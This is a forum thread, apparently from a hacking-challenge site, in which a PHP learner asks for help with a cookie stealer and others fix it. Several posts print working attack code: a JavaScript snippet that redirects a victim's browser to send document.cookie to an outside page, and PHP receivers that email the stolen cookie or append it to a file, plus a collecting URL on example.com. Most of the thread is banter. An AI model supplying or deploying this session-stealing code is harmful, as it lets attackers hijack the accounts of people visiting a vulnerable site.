Making a cookie stealer

Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

And if you want to help please don't post actual pieces of code as I want to try to make this on my own, if you see something wrong just say what line it is on and tell me the problem.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare

thehare wrote: Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare

First off, you can't link to 'localhost' you need to link to your IP adress. The adress should look like this:

http://98.28.328.4323/projects/cl.php?cookie= etc etc. Secondly, you would need a mail server running on your server in order to be able to have it mailed to you. Those are 2 errors I could pick up on pretty quickly. Also, it's easier to write their cookie info to a text file or HTML file.

slpctrl wrote: [quote]thehare wrote: Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare

First off, you can't link to 'localhost' you need to link to your IP adress. The adress should look like this:

http://98.28.328.4323/projects/cl.php?cookie= etc etc. Secondly, you would need a mail server running on your server in order to be able to have it mailed to you. Those are 2 errors I could pick up on pretty quickly. Also, it's easier to write their cookie info to a text file or HTML file.[/quote]

Ok first I put local host as a "filler" I was using my actual IP for the test sorry for that "typo" and anyways thanks for the information on the mail server I will have to try something else.

And the point of me doing this is so I can try to improve my (poor) PHP skills.

Improve first, hack 1337er.

spyware wrote: Improve first, hack 1337er.

Improve what???

thehare wrote: Improve what???

Reading skills :angry:, and your poor PHP skills which you've mentioned.

Your cooking skills aswell. Have you ever seen a hungry hacker? A hungry hacker is an angry hacker. TRUTH.

Word to that, never hack on an empty stomach, its a recipe for disaster! :ninja:

I'm pretty sure I know what your talking about but you don't need a real cookie stealer just the XSS part;)

SaMTHG wrote: I'm pretty sure I know what your talking about but you don't need a real cookie stealer just the XSS part;) What?

Why do people insist on talking when they have no idea what they're talking about?

I'm just letting him now he doesn't need any PHP it's the exploit that counts

SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts

You're an idiot.

http://ccl.whiteacid.org/

SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use XSS, but the point of trying this is just to improve my PHP skills.

thehare wrote: I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.

You're an idiot too, :D. You don't understand what you're trying to do.

thehare wrote: [quote]SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.

slpctrl wrote: [quote]thehare wrote: [quote]SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.[/quote]

Alright I'll look into that, but now I am wondering, is how hard is it to make a cookie stealer in PHP.

It's easy. Make the page to get the cookies from a get variable, let's say get variable cookie, then save it to a text file. Afterwards, access the page thru javascript like: location.href="page.php?cookie="+document.cookie

Simple as that!

And no! I did not read the whole thread before. but i agree, you sir are indeed an idiot.

here

<?php $cookie = $_GET['cookie']; $fp = fopen("cookies.txt", "a"); fwrite($fp, 'Cookie: '.$cookie.); fclose($fp); header ("Location:"); ?>

i know you didn't want this but obviously this is the best your going to get. just work on improving it

slpctrl wrote: [quote]thehare wrote: [quote]SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.[/quote] If I didn't know what I was talking about I wouldn't have been able to complete the HTS chall would I? Anyway I'm sorry I didn't understand at first I thought you wanted to complete the chall I didn't know you actually wanted to code a CookieStealer if you had I would have tried to help( Not too great with the PHP:whoa:)

If I didn't know what I was talking about I wouldn't have been able to complete the HTS chall would I?

Challenges and points mean absolutely NOTHING. And anyways you probably asked someone for the answer like you have for most of the challenges here.

Dude, you send the person a link to your cookie stealer with a get request. On the server side, you log the request and write it to a file. <script>window.location="http://example.com?cookie="+document.cookie</script> Server side: <?php $cookie=$_GET['cookie']; fopen(file,method); fwrite(file,$cookie); fclose(file); ?> This is not obscure in the least, and the code will need to be optimized for efficiency (Hell it's not guaranteed to work since i didn't bother to test it). Also, I'm not any sort of expert in XSS and the like at all. Check out http://xssed.com

SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts That makes just about as much sense as milkshakes without the milk or mixdranks without slpctrl B) It just doesn't work like that. They have to coexist to amount to anything.

Pwnzall wrote: [quote]SaMTHG wrote: I'm just letting him now he doesn't need any PHP it's the exploit that counts or mixdranks without slpctrl B)[/quote]

B)

If you just wanted a cookie logger then there are some excellent ones in our code bank here. But as it seems like you have no clue on what it's all about or what so ever i suggest you learn some javascript first. Maybe then you understand that javascript is client side ie you! PHP is server side ie the server where the site is hosted on.